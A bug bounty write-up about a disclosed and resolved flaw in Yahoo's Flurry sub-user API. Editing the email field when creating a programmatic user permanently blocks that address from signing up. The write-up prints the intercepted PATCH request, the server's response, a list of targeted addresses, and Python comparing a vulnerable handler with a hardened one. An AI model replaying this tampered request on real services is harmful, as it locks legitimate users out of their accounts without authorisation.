DoS attack in Yahoo: how I was able to deny new users the service

Hey all,

This writeup describes how I was able to deny newly signing-up users from using the Flurry service.

According to Wikipedia, Flurry is an American mobile analytics, monetization and advertising company and a subsidiary of Yahoo.

Denial of Service Attack

I created an account in the normal way at https://login.flurry.com/signup and spotted a Sub-Users feature at https://dev.flurry.com/admin/users

This feature allows you to:

  • Invite a sub-user with customized permissions
  • Create a programmatic user with API permissions

Programmatic users can only be used with the API, through access tokens generated by the account that created them.

Using the programmatic option, I got an access token and a random mail address @programmatic.flurry.com

All programmatic users' emails are restricted to @programmatic.flurry.com.

So I opened Burp and intercepted the request that creates a programmatic user:

PATCH /pulse/v1/ HTTP/2
Host: ecto.flurry.com

[
  {
    "op": "add",
    "path": "user",
    "value": {
      "type": "user",
      "id": "5b1b8f87-9d79-4516-8576-f77e4411a46a",
      "attributes": {
        "email": "354732_bd6adce9-2118-4fb9-a043-009f49968553@programmatic.flurry.com",
        "programmatic": "true"
      }
    }
  },
  {
    "op": "add",
    "path": "user/5b1b8f87-9d79-4516-8576-f77e4411a46a/memberships",
    "value": {
      "type": "membership",
      "id": "f3ca1d13-12d1-4b0c-8faa-fc14ffb499a3",
      "attributes": {
        "role": "NONE",
        "title": "*",
        "productRoles": {
          "Analytics": "VIEWER",
          "AppSpot": "VIEWER",
          "AdAnalytics": "NONE",
          "RawDataDownload": "DEV",
          "GDPRDataSubjectRights": "NONE"
        }
      },
      "relationships": {
        "company": {"data": [{"type": "company", "id": "354732"}]},
        "user": {"data": [{"type": "user", "id": "5b1b8f87-9d79-4516-8576-f77e4411a46a"}]}
      }
    }
  }
]

I changed the value of email to one like mostafa@gmail.com and it worked:

HTTP/2 200 OK

[
  {
    "data": {
      "type": "user",
      "id": "482035",
      "attributes": {
        "email": "mostafa@gmail.com",
        "firstName": null,
        "lastName": null,
        "programmatic": true
      },
      "relationships": {
        "memberships": {"data": [{"type": "membership", "id": "547510"}]}
      }
    }
  },
  {
    "data": {
      "type": "membership",
      "id": "547510",
      "attributes": {
        "creationDate": null,
        "limitAccess": false,
        "limitedAccessProjects": [],
        "primaryMembership": false,
        "productRoles": {
          "Analytics": "VIEWER",
          "AppSpot": "VIEWER",
          "AdAnalytics": "NONE",
          "RawDataDownload": "DEV",
          "GDPRDataSubjectRights": "NONE"
        },
        "role": "NONE",
        "title": "Cairo programmatic 90477"
      },
      "relationships": {
        "company": {"data": {"type": "company", "id": "354732"}},
        "user": {"data": {"type": "user", "id": "482035"}}
      }
    }
  }
]

Then I went to create an account normally with mostafa@gmail.com; it said Email already exists. I tried to reset the password for the account, and after changing the password it said Invalid email or password.

I used the same attack with emails like [administrator-admin-support-test-contact-it-security]@flurry.com

I could deny a large list of common emails belonging to @flurry.com and @yahoo.com from using the service, since the only way to use these accounts is through an access token, which is generated by another account.

This allowed me to permanently deny service to any account that would be newly created with those addresses.
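As an added example (my own code, not Flurry's; the handler names, the request shape I reuse and the placeholder UUID are assumptions), this is the kind of server-side check that closes the bug: a handler that stores whatever email the client sends, beside a hardened one that rejects foreign addresses and mints the @programmatic.flurry.com address itself.

```python
import json
import uuid

# Domain that the writeup says programmatic-user addresses are restricted to.
PROGRAMMATIC_DOMAIN = "programmatic.flurry.com"

def is_programmatic_address(email: str) -> bool:
    """True only if the address is in the restricted domain (exact domain match)."""
    local, sep, domain = email.rpartition("@")
    return sep == "@" and bool(local) and domain.lower() == PROGRAMMATIC_DOMAIN

def _user_op(body: str) -> dict:
    """Pull the 'add user' op out of the JSON-patch style body (shape from the writeup)."""
    ops = json.loads(body)
    return next(o["value"] for o in ops if o.get("op") == "add" and o.get("path") == "user")

def create_programmatic_user_vulnerable(company_id: str, body: str) -> dict:
    """Trusts the client-supplied email, so any address can be pre-registered."""
    attrs = _user_op(body)["attributes"]
    return {"email": attrs["email"], "programmatic": True}

class ValidationError(ValueError):
    pass

def create_programmatic_user_hardened(company_id: str, body: str) -> dict:
    """Rejects a foreign address and mints the email server-side in the restricted domain."""
    attrs = _user_op(body).get("attributes", {})
    if str(attrs.get("programmatic", "")).lower() != "true":
        raise ValidationError("this endpoint only creates programmatic users")
    supplied = attrs.get("email")
    if supplied is not None and not is_programmatic_address(supplied):
        raise ValidationError(f"programmatic users must be @{PROGRAMMATIC_DOMAIN}")
    # Never store what the client sent; the server owns the address.
    email = f"{company_id}_{uuid.uuid4()}@{PROGRAMMATIC_DOMAIN}"
    return {"email": email, "programmatic": True}

def _body(email: str) -> str:
    # Constructed request shaped like the PATCH in the writeup; the UUID is made up.
    return json.dumps([{"op": "add", "path": "user", "value": {
        "type": "user", "id": "00000000-0000-4000-8000-000000000001",
        "attributes": {"email": email, "programmatic": "true"}}}])

TAMPERED_BODY = _body("mostafa@gmail.com")                  # the edited request
NORMAL_BODY = _body("354732_abc@" + PROGRAMMATIC_DOMAIN)     # what the UI sends

if __name__ == "__main__":
    print(create_programmatic_user_vulnerable("354732", TAMPERED_BODY)["email"])  # mostafa@gmail.com
    print(create_programmatic_user_hardened("354732", NORMAL_BODY)["email"])
```

The domain check compares the whole domain, so a look-alike such as programmatic.flurry.com.example is rejected as well.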

Report Timeline:

  • December 17, 2019 — Bug reported
  • December 21, 2019 — Bug triaged
  • January 28, 2020 — Bug resolved
  • February 12, 2020 — Bounty rewarded: $1000